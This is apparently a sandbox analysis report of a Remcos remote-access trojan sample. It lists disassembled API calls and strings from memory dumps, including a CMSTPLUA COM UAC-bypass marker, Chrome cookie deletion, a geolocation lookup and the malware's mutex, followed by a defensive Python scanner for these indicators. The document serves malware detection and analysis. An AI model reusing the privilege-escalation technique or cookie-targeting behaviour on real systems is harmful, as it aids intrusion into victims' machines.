                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 020FFEF4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                  • String ID: P[G
                                                  • API String ID: 2536120697-571123470
                                                  • Opcode ID: 66d1d2f93b0a437ba6194d5bb56da3cbca8cefc802f69fb3ca8fff7099274c15
                                                  • Instruction ID: b4aeb759649902303b868b8666afa2734a163cf320512ed68481f21f7536ca2b
                                                  • Opcode Fuzzy Hash: 66d1d2f93b0a437ba6194d5bb56da3cbca8cefc802f69fb3ca8fff7099274c15
                                                  • Instruction Fuzzy Hash: 10113631E80629ABCB54F7A4D844AEE77799F40714B200069FA09775C0EB709F45DBD4
                                                  APIs
                                                  • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041A53E
                                                  • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041A554
                                                  • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041A56D
                                                  • InternetCloseHandle.WININET(00000000), ref: 0041A5B3
                                                  • InternetCloseHandle.WININET(00000000), ref: 0041A5B6
                                                  Strings
                                                  • http://geoplugin.net/json.gp, xrefs: 0041A54E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Internet$CloseHandleOpen$FileRead
                                                  • String ID: http://geoplugin.net/json.gp
                                                  • API String ID: 3121278467-91888290
                                                  • Opcode ID: 8d796e82819d20c7747317835cdf85fb334a8da14db2c504802a4fd71c56bfc3
                                                  • Instruction ID: 402fbdb1aff19a1981f8347c65821a4f206ec005c70a85ea4635686413b1fe25
                                                  • Opcode Fuzzy Hash: 8d796e82819d20c7747317835cdf85fb334a8da14db2c504802a4fd71c56bfc3
                                                  • Instruction Fuzzy Hash: 2711C87110A3126BD214AA169C45DBF7FDCEF46365F00053EF905D2191DB689C48C6B6
                                                  APIs
                                                    • Part of subcall function 0044FA22: _free.LIBCMT ref: 0044FA4B
                                                  • _free.LIBCMT ref: 0044FD29
                                                    • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                    • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                  • _free.LIBCMT ref: 0044FD34
                                                  • _free.LIBCMT ref: 0044FD3F
                                                  • _free.LIBCMT ref: 0044FD93
                                                  • _free.LIBCMT ref: 0044FD9E
                                                  • _free.LIBCMT ref: 0044FDA9
                                                  • _free.LIBCMT ref: 0044FDB4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                  • Instruction ID: b6f47af98b99390d2ca34363280ce03bc5e4d1be0f6c4f29549f69d6ae0d3a9a
                                                  • Opcode Fuzzy Hash: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                  • Instruction Fuzzy Hash: 5F119031711B04B6F520FBB2CC07FCBB7DC9F42308F814C2EB29E76152E628A9184645
                                                  APIs
                                                    • Part of subcall function 0213FC89: _free.LIBCMT ref: 0213FCB2
                                                  • _free.LIBCMT ref: 0213FF90
                                                    • Part of subcall function 02136D2C: HeapFree.KERNEL32(00000000,00000000,?,0213FCB7,?,00000000,?,00000000,?,0213FF5B,?,00000007,?,?,0214046C,?), ref: 02136D42
                                                    • Part of subcall function 02136D2C: GetLastError.KERNEL32(?,?,0213FCB7,?,00000000,?,00000000,?,0213FF5B,?,00000007,?,?,0214046C,?,?), ref: 02136D54
                                                  • _free.LIBCMT ref: 0213FF9B
                                                  • _free.LIBCMT ref: 0213FFA6
                                                  • _free.LIBCMT ref: 0213FFFA
                                                  • _free.LIBCMT ref: 02140005
                                                  • _free.LIBCMT ref: 02140010
                                                  • _free.LIBCMT ref: 0214001B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                  • Instruction ID: e16f1f5a1fd16697f5ddad1d3ac4e7be25e3352c165673fa1d4f0b31c6ae9656
                                                  • Opcode Fuzzy Hash: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                  • Instruction Fuzzy Hash: 79114F719C0B0CBED522B7B1CC05FCBBFAF9F09B20F400815A69966851DB77B9094E50
                                                  APIs
                                                  • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Users\user\Desktop\yPIOW6yoPi.exe), ref: 00406835
                                                    • Part of subcall function 00406764: _wcslen.LIBCMT ref: 00406788
                                                    • Part of subcall function 00406764: CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                  • CoUninitialize.OLE32 ref: 0040688E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InitializeObjectUninitialize_wcslen
                                                  • String ID: C:\Users\user\Desktop\yPIOW6yoPi.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                  • API String ID: 3851391207-2353147453
                                                  • Opcode ID: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                  • Instruction ID: 622c6236034ee416db36617ed9a374104512909f75adacabffe0517dc70a223e
                                                  • Opcode Fuzzy Hash: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                  • Instruction Fuzzy Hash: A501C0722013106FE2287B11DC0EF3B2658DB4176AF22413FF946A71C1EAA9AC104669
                                                  APIs
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0040FEDF
                                                  • int.LIBCPMT ref: 0040FEF2
                                                    • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                    • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                  • std::_Facet_Register.LIBCPMT ref: 0040FF2E
                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FF54
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FF70
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                  • String ID: H]G
                                                  • API String ID: 2536120697-1717957184
                                                  • Opcode ID: 3e4a8574ab9db7722bfa12a95caa071d2d4e3d0815d43ad0032f2c9a3dec5087
                                                  • Instruction ID: c39742161ac3258eace465d30f2780732a1ff9819e97f4bd037edafe9ec39b9f
                                                  • Opcode Fuzzy Hash: 3e4a8574ab9db7722bfa12a95caa071d2d4e3d0815d43ad0032f2c9a3dec5087
                                                  • Instruction Fuzzy Hash: 9011BF31900419ABCB24FBA5C8468DDB7799F95318B20007FF505B72C1EB78AF09C799
                                                  APIs
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 02100146
                                                  • int.LIBCPMT ref: 02100159
                                                    • Part of subcall function 020FD147: std::_Lockit::_Lockit.LIBCPMT ref: 020FD158
                                                    • Part of subcall function 020FD147: std::_Lockit::~_Lockit.LIBCPMT ref: 020FD172
                                                  • std::_Facet_Register.LIBCPMT ref: 02100195
                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 021001BB
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 021001D7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                  • String ID: H]G
                                                  • API String ID: 2536120697-1717957184
                                                  • Opcode ID: 0a2989e8c640b6c3179e3035855110f6a7cb0f7e06d84751caa425ed32edbe19
                                                  • Instruction ID: 52c7765708a5e76615725d44811dfa0c7db9ff682b86663612339fb3877588ae
                                                  • Opcode Fuzzy Hash: 0a2989e8c640b6c3179e3035855110f6a7cb0f7e06d84751caa425ed32edbe19
                                                  • Instruction Fuzzy Hash: A411C631980518EFCB14FBA4C984AEDB77A9F58714B200059E405671D0EFB0DF46CF95
                                                  APIs
                                                  • _wcslen.LIBCMT ref: 020F69EF
                                                  • CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 020F6A50
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Object_wcslen
                                                  • String ID: $$[+] CoGetObject SUCCESS$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                  • API String ID: 240030777-4254711192
                                                  • Opcode ID: db32128b02a1ccbc70c4588b7822f6c775a314ba91b6364ff21a4127614396bf
                                                  • Instruction ID: db1128475e27b3f1e98184f618eb2b92c31a9abccdf98bcb7f91e2240e8eaa82
                                                  • Opcode Fuzzy Hash: db32128b02a1ccbc70c4588b7822f6c775a314ba91b6364ff21a4127614396bf
                                                  • Instruction Fuzzy Hash: 5011A5B2950228AFDB10EBA4D854BDEB7BCDF44710F50006AF904E3540FB799E148E79
                                                  APIs
                                                  • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040B2E4
                                                  • GetLastError.KERNEL32 ref: 0040B2EE
                                                  Strings
                                                  • UserProfile, xrefs: 0040B2B4
                                                  • [Chrome Cookies found, cleared!], xrefs: 0040B314
                                                  • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040B2AF
                                                  • [Chrome Cookies not found], xrefs: 0040B308
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DeleteErrorFileLast
                                                  • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                  • API String ID: 2018770650-304995407
                                                  • Opcode ID: d277c2480a2acdc88d81545d73a68c117e64bf0eb3316d6d5e723ac94531354e
                                                  • Instruction ID: 647c9f6895dd19beb09db90be4e639f81332b1b521455d1adc7a9c6a9ee315b4
                                                  • Opcode Fuzzy Hash: d277c2480a2acdc88d81545d73a68c117e64bf0eb3316d6d5e723ac94531354e
                                                  • Instruction Fuzzy Hash: 3301A23164410557CB047BB5DD6B8AF3624ED50708F60013FF802B32E2FE3A9A0586CE
                                                  APIs
                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0210CBEF
                                                    • Part of subcall function 0210CC86: RegisterClassExA.USER32(00000030), ref: 0210CCD3
                                                    • Part of subcall function 0210CC86: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0210CCEE
                                                    • Part of subcall function 0210CC86: GetLastError.KERNEL32 ref: 0210CCF8
                                                  • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0210CC26
                                                  • lstrcpyn.KERNEL32(00473B68,0046C104,00000080), ref: 0210CC40
                                                  • Shell_NotifyIcon.SHELL32(00000000,00473B50), ref: 0210CC56
                                                  • TranslateMessage.USER32(?), ref: 0210CC62
                                                  • DispatchMessageA.USER32(?), ref: 0210CC6C
                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0210CC79
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                  • String ID:
                                                  • API String ID: 1970332568-0
                                                  • Opcode ID: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                  • Instruction ID: e870f3f885a83525ed013f1c5c3f7df24de48c0686c65927f8a14ae8671185f4
                                                  • Opcode Fuzzy Hash: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                  • Instruction Fuzzy Hash: B80144B1904348ABD7109FA5ED4CEDB7BBCA745B16F004135F605E30A2D7B8A285DF68
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: C:\Users\user\Desktop\yPIOW6yoPi.exe$Rmc-I7G983$BG
                                                  • API String ID: 0-977880241
                                                  • Opcode ID: d1be4aec57154437973d558091bbe471e33116169eb7d1567a4c56866b781843
                                                  • Instruction ID: a0817f974ad937f6cb5b9dd001e5131ae01746641b95ac10126ddf8aadfa6e31
                                                  • Opcode Fuzzy Hash: d1be4aec57154437973d558091bbe471e33116169eb7d1567a4c56866b781843
                                                  • Instruction Fuzzy Hash: 05F096B17022109BDB103774BC1967A3645A780356F01847BF94BFA6E5DB3C8851869C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: C:\Users\user\Desktop\yPIOW6yoPi.exe$Rmc-I7G983$BG
                                                  • API String ID: 0-977880241
                                                  • Opcode ID: d1be4aec57154437973d558091bbe471e33116169eb7d1567a4c56866b781843
                                                  • Instruction ID: 6ea58e811fe75114d0e2bdbc96349baf05204e0a519867bf453569366ec5c46e
                                                  • Opcode Fuzzy Hash: d1be4aec57154437973d558091bbe471e33116169eb7d1567a4c56866b781843
                                                  • Instruction Fuzzy Hash: 9CF0FC70AC13108BCBA03B306D147B9365EE740792F004475F719D7961EB254881A688
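The geoplugin.net URL from the WinINet function, the Chrome cookie path from the DeleteFileA function, the CMSTPLUA CLSID and UACMe marker from the CoGetObject functions, and the Rmc-I7G983 mutex string in the two blocks directly above are all plain strings in the unpacked image, which is why both the 0x400000 and the 0x20F0000 dumps carry them. The scanner below is an added example, not the sample's code and not Joe Sandbox output. It carves those indicators out of a raw dump in both the ANSI and the UTF-16LE form the calling API implies (InternetOpenUrlW and CoGetObject take wide strings, DeleteFileA takes an ANSI string) and generalises the mutex to the Rmc-<tag> naming Remcos uses, so it matches other builds of the family and not only this one. The dump bytes are constructed inline. The Elevation:Administrator!new: prefix is the documented COM elevation moniker syntax; its presence in front of the CLSID is an assumption, since the report shows only the bare CLSID.

```python
"""Carve the Remcos indicators listed above out of a raw memory dump.

Added example for this report; not the sample's code and not Joe Sandbox
output. The dump bytes below are constructed to mimic process memory.
"""
import re
from typing import NamedTuple


class Hit(NamedTuple):
    name: str
    encoding: str   # "ascii" or "utf-16le"
    offset: int
    value: str


# Fixed strings taken from the function listings in this report.
FIXED_IOCS = {
    "geoplugin_url": "http://geoplugin.net/json.gp",
    "chrome_cookie_path": r"\AppData\Local\Google\Chrome\User Data\Default\Cookies",
    "cmstplua_clsid": "{3E5FC7F9-9A51-4367-9063-A120244FBEC7}",
    "uacme_marker": "ucmCMLuaUtilShellExecMethod",
}

# Remcos names its mutex "Rmc-" plus a short alphanumeric tag (Rmc-I7G983 in
# this sample); match the family, not just this build.
_MUTEX_ASCII = re.compile(rb"Rmc-[A-Z0-9]{4,12}")
_MUTEX_WIDE = re.compile(rb"R\x00m\x00c\x00-\x00(?:[A-Z0-9]\x00){4,12}")


def _patterns():
    """Yield (name, encoding, regex) for each indicator in both A/W encodings."""
    for name, text in FIXED_IOCS.items():
        yield name, "ascii", re.compile(re.escape(text.encode("ascii")))
        yield name, "utf-16le", re.compile(re.escape(text.encode("utf-16le")))
    yield "remcos_mutex", "ascii", _MUTEX_ASCII
    yield "remcos_mutex", "utf-16le", _MUTEX_WIDE


def scan(dump: bytes) -> list[Hit]:
    """Return every indicator hit in the dump, ordered by offset."""
    hits = [
        Hit(name, enc, m.start(), m.group().decode(enc))
        for name, enc, pat in _patterns()
        for m in pat.finditer(dump)
    ]
    return sorted(hits, key=lambda h: h.offset)


def build_demo_dump() -> bytes:
    """Constructed dump: each string in the encoding its calling API implies."""
    pad = b"\x00" * 16
    # Elevation:Administrator!new: is the documented COM elevation moniker
    # prefix; pairing it with the CLSID here is an assumption, the report
    # shows only the CLSID itself.
    moniker = "Elevation:Administrator!new:" + FIXED_IOCS["cmstplua_clsid"]
    return (
        pad
        + FIXED_IOCS["geoplugin_url"].encode("utf-16le")     # InternetOpenUrlW
        + pad
        + FIXED_IOCS["chrome_cookie_path"].encode("ascii")   # DeleteFileA
        + pad
        + moniker.encode("utf-16le")                         # CoGetObject
        + pad
        + b"[+] ucmCMLuaUtilShellExecMethod\n"                # UACMe debug print
        + pad
        + b"Rmc-I7G983\x00"                                  # mutex name
        + pad
    )


if __name__ == "__main__":
    for h in scan(build_demo_dump()):
        print(f"{h.offset:#08x} {h.encoding:8} {h.name:20} {h.value}")
```

Run it against the .sdmp files linked from the Memory Dump Source entries instead of the demo bytes and the same hits come back with their real offsets; the wide-string matches are the ones that show up only after unpacking, which is why the packed file on disk yields fewer. One caveat on the cookie indicator: the hard-coded Default\Cookies path is the older Chrome profile layout, and current Chrome keeps the cookie database under Default\Network\Cookies, so a file-deletion rule derived from this sample should cover both locations.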
                                                  APIs
                                                  • _free.LIBCMT ref: 00443305
                                                    • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                    • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                  • _free.LIBCMT ref: 00443317
                                                  • _free.LIBCMT ref: 0044332A
                                                  • _free.LIBCMT ref: 0044333B
                                                  • _free.LIBCMT ref: 0044334C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID: XNY
                                                  • API String ID: 776569668-3785567681
                                                  • Opcode ID: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                  • Instruction ID: 76e6a482bc9a1727a28655d1f271e5fc3ecde01143ea680422932a64b095765e
                                                  • Opcode Fuzzy Hash: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                  • Instruction Fuzzy Hash: B9F05EF08075209FAB12AF2DBD014893BA0B786755306413BF41EB2772EB380D95DB8E
                                                  APIs
                                                    • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                  • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00419F64
                                                  • PlaySoundW.WINMM(00000000,00000000), ref: 00419F72
                                                  • Sleep.KERNEL32(00002710), ref: 00419F79
                                                  • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00419F82
Memory Dump Source
• Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
Similarity
                                                  • API ID: PlaySound$HandleLocalModuleSleepTime
                                                  • String ID: Alarm triggered$`#v
                                                  • API String ID: 614609389-3049340936
                                                  • Opcode ID: ed34942b98ab4bc35e84cddc730c191cd9dbe71c9bbe8efa97cecb4db88c0309
                                                  • Instruction ID: 0fe531f7edf44dbbc4d7c544cb5d4c76277d8d7fe89cd9bd4aa838a143c441bc
                                                  • Opcode Fuzzy Hash: ed34942b98ab4bc35e84cddc730c191cd9dbe71c9bbe8efa97cecb4db88c0309
                                                  • Instruction Fuzzy Hash: 50E09A22A0422033862033BA7C0FC6F3E28DAC6B75B4100BFF905A21A2AE54081086FB
                                                  APIs
                                                  • __allrem.LIBCMT ref: 00439789
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397A5
                                                  • __allrem.LIBCMT ref: 004397BC
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397DA
                                                  • __allrem.LIBCMT ref: 004397F1
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043980F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
Similarity
                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                  • String ID:
                                                  • API String ID: 1992179935-0
                                                  • Opcode ID: f1fde5a02fd595428c5ea82786117b3ca59670a7c5a9c6947d2ee4ceb3542413
                                                  • Instruction ID: 29148231e9435c1f59b8c02308e8e4f0c882d016d38a0f6ab7871d26eba04b65
                                                  • Opcode Fuzzy Hash: f1fde5a02fd595428c5ea82786117b3ca59670a7c5a9c6947d2ee4ceb3542413
                                                  • Instruction Fuzzy Hash: 7A811B726017069BE724AE79CC82B6F73A8AF49328F24512FF511D66C1E7B8DD018B58
                                                  APIs
                                                  • __allrem.LIBCMT ref: 021299F0
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02129A0C
                                                  • __allrem.LIBCMT ref: 02129A23
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02129A41
                                                  • __allrem.LIBCMT ref: 02129A58
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02129A76
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
Similarity
                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                  • String ID:
                                                  • API String ID: 1992179935-0
                                                  • Opcode ID: f1fde5a02fd595428c5ea82786117b3ca59670a7c5a9c6947d2ee4ceb3542413
                                                  • Instruction ID: f05b536ab75bb0b206f06950c3b98873eb190f31169cce1ba74a4a6091682182
                                                  • Opcode Fuzzy Hash: f1fde5a02fd595428c5ea82786117b3ca59670a7c5a9c6947d2ee4ceb3542413
                                                  • Instruction Fuzzy Hash: 13812AB2681726AFE7259E7CCC41B6A73AAEF40324F34453EF515DB680E770D5188B50
                                                  APIs
                                                  • _free.LIBCMT ref: 02132DCF
                                                  • _free.LIBCMT ref: 02132DE9
                                                  • _free.LIBCMT ref: 02132DF4
                                                  • _free.LIBCMT ref: 02132EC8
                                                  • _free.LIBCMT ref: 02132EE4
                                                    • Part of subcall function 0212AABB: IsProcessorFeaturePresent.KERNEL32(00000017,0212AA8D,?,?,020F1BC9,?,?,00000000,?,?,0212AAAD,00000000,00000000,00000000,00000000,00000000), ref: 0212AABD
                                                    • Part of subcall function 0212AABB: GetCurrentProcess.KERNEL32(C0000417), ref: 0212AADF
                                                    • Part of subcall function 0212AABB: TerminateProcess.KERNEL32(00000000), ref: 0212AAE6
                                                  • _free.LIBCMT ref: 02132EEE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
Similarity
                                                  • API ID: _free$Process$CurrentFeaturePresentProcessorTerminate
                                                  • String ID:
                                                  • API String ID: 2329545287-0
                                                  • Opcode ID: 4118d0c7a5faff20c3bdd9400e50d9846731c96832acf5071bf3a173b9413d13
                                                  • Instruction ID: 2a20d5b704c794761f80cd2f6a56864a03ad9d8a674d5e911503e483238c509f
                                                  • Opcode Fuzzy Hash: 4118d0c7a5faff20c3bdd9400e50d9846731c96832acf5071bf3a173b9413d13
                                                  • Instruction Fuzzy Hash: 4151BD365442156FDB26BF78D841BBABBEBDF41724F24406AED449B240EB339D02C790
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,02139E08,00000001,00000001,00000006), ref: 02139C11
                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,?,?,?,02139E08,00000001,00000001,00000006), ref: 02139C97
